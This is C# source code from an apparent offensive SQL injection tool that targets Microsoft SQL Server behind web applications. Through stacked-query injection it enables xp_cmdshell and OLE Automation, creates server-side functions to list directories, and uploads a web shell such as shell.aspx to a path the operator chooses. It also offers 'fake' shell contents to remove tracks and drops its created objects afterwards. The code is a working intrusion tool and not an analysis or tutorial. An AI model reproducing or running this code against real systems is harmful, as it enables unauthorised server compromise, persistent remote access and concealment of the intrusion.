public static void initialize(string url)
{
Log.logNotification("Confirming Web Response..");
var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
{
Log.logNotification("Web Response is OK..");
if (createFuncDir(url))
{
string UserChoice = "z";
while (UserChoice != "x")
{
UserChoice = UserInteraction.takeInputString("Press 'x' for Exit..\nEnter Directory to get listing.. eg C:\\, C:\\users\\.. ");
if (UserChoice != "x")
{
navigate(url, UserChoice);
}
}
dropObject(url, QueriesDB.DropFuncQuery);
}
}
else
{
Log.logError("No response from the server..");
}
}
public static string[] getObjects(string url, string stackedQuery, string replacement)
{
string URLFortableDumpToTempTable = QueryCrafter.construcQueryForTableDump(url, stackedQuery, replacement);
if (ResponseFilter.confirmResponce(URLFortableDumpToTempTable, replacement))
{
string URLForTableOutput = QueryCrafter.constructURLForOutputFromTempTable(url);
var response = HTTPMethods.getResponse(URLForTableOutput);
if (response != null)
{
response = ResponseFilter.getPureResponse(response);
return(ResponseFilter.parseResponce(response));
}
else
{
return(null);
}
}
else
{
return(null);
}
}
public static bool enableXPCMDShell(string url)
{
string XPCMDShellEnablingQuery = QueryCrafter.constructStackedQuery(url, QueriesDB.EnableXPCMDShell);
XPCMDShellEnablingQuery = XPCMDShellEnablingQuery.Replace("'rummykhan'", QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(XPCMDShellEnablingQuery, QueriesDB.Replacement))
{
Log.logOutput("XP CMD Shell Enabled..");
return(true);
}
Log.logError("Failed to Enable XP CMD Shell..");
return(false);
}
public static bool enableOLEAutomation(string url)
{
string OLEAutomationEnablingQuery = QueryCrafter.constructStackedQuery(url, QueriesDB.EnableOLEAutomation);
OLEAutomationEnablingQuery = OLEAutomationEnablingQuery.Replace("'rummykhan'", QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(OLEAutomationEnablingQuery, QueriesDB.Replacement))
{
Log.logOutput("OLE Automation Enabled..");
return(true);
}
Log.logError("Failed to Enable OLE Automation Procedures..");
return(false);
}
public static void initialize(string url)
{
Log.logNotification("Confirming Web Response..");
var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
{
Log.logNotification("Web Response is OK..");
getTables(url);
}
else
{
Log.logError("No response from the server..");
}
}
static bool createProcFcUk(string url)
{
try
{
var FcUkProcCreationURL = QueryCrafter.constructStackedQuery(url, QueriesDB.UploadFileProcQuery);
FcUkProcCreationURL = QueryCrafter.constructURLForConfirmation(FcUkProcCreationURL, QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(FcUkProcCreationURL, QueriesDB.Replacement))
{
var FcUkProcConfirmationURL = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmFcUkProcQuery);
var response = HTTPMethods.getResponse(FcUkProcConfirmationURL);
if (response != null)
{
if (ResponseFilter.getPureResponseWithLastIndex(response) == "FcUk")
{
Log.logOutput("Procedure to Upload Shell is created..");
return(true);
}
else
{
Log.logError("1 Procedure to Upload Shell cannot be created..");
return(false);
}
}
else
{
Log.logError("2 Procedure to Upload Shell cannot be created..");
return(false);
}
}
else
{
Log.logError("Erroneous response from the server..");
Log.logError("Procedure to Upload Shell cannot be created..");
return(false);
}
}
catch (Exception ex)
{
Log.logError(ex.Message);
return(false);
}
}
static bool createFuncDir(string url)
{
try
{
var DIRFuncCreationURL = QueryCrafter.constructStackedQuery(url, QueriesDB.DirListingFuncQuery);
DIRFuncCreationURL = QueryCrafter.constructURLForConfirmation(DIRFuncCreationURL, QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(DIRFuncCreationURL, QueriesDB.Replacement))
{
var DIRFuncConfirmationURL = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmDirFuncQuery);
var response = HTTPMethods.getResponse(DIRFuncConfirmationURL);
if (response != null)
{
if (ResponseFilter.getPureResponseWithLastIndex(response) == "Dir")
{
Log.logOutput("Function to get Directory Listing is created..");
return(true);
}
else
{
Log.logError("Function to get Directory Listing cannot be created..");
return(false);
}
}
else
{
Log.logError("Function to get Directory Listing cannot be created..");
return(false);
}
}
else
{
Log.logError("Erroneous response from the server..");
Log.logError("Function to get Directory Listing cannot be created..");
return(false);
}
}
catch (Exception ex)
{
Log.logError(ex.Message);
return(false);
}
}
static bool dropObject(string url, string ObjectDroppingQuery)
{
try
{
var DirFuncDroppingQuery = QueryCrafter.constructURLForDroppingObject(url, ObjectDroppingQuery);
DirFuncDroppingQuery = QueryCrafter.constructURLForConfirmation(DirFuncDroppingQuery, QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(DirFuncDroppingQuery, QueriesDB.Replacement))
{
return(true);
}
else
{
return(false);
}
}
catch (Exception ex)
{
Log.logError(ex.Message);
return(false);
}
}
public static void Spawn(string url)
{
Log.logNotification("Confirming Web Response..");
var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
{
Log.logNotification("Web Response is OK..");
if (createProcFcUk(url))
{
string RootPath = "z";
while (RootPath != "x")
{
RootPath = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ ");
if (RootPath != "x")
{
string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx ..");
string UrlForUploading = null;
string x = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks..");
if (x == "f")
{
UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE);
}
else
{
UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL);
}
UrlForUploading = UrlForUploading.Replace("[PATH]", RootPath);
UrlForUploading = UrlForUploading.Replace("[FILENAME]", fileName);
UrlForUploading = UrlForUploading.Replace("rummykhan", QueriesDB.Replacement);
Log.logNotification("Uploading shell to " + RootPath + fileName);
if (ResponseFilter.confirmResponce(UrlForUploading, QueriesDB.Replacement))
{
Log.logNotification("Confirming File Upload..");
if (confirmFileUpload(url, RootPath + fileName))
{
Log.logOutput("Shell uploaded successfully to : " + RootPath + fileName);
}
else
{
Log.logError("Fail to upload file..");
}
}
}
}
}
dropObject(url, QueriesDB.DropFcUkProcQuery);
}
else
{
Log.logError("No response from the server..");
}
}
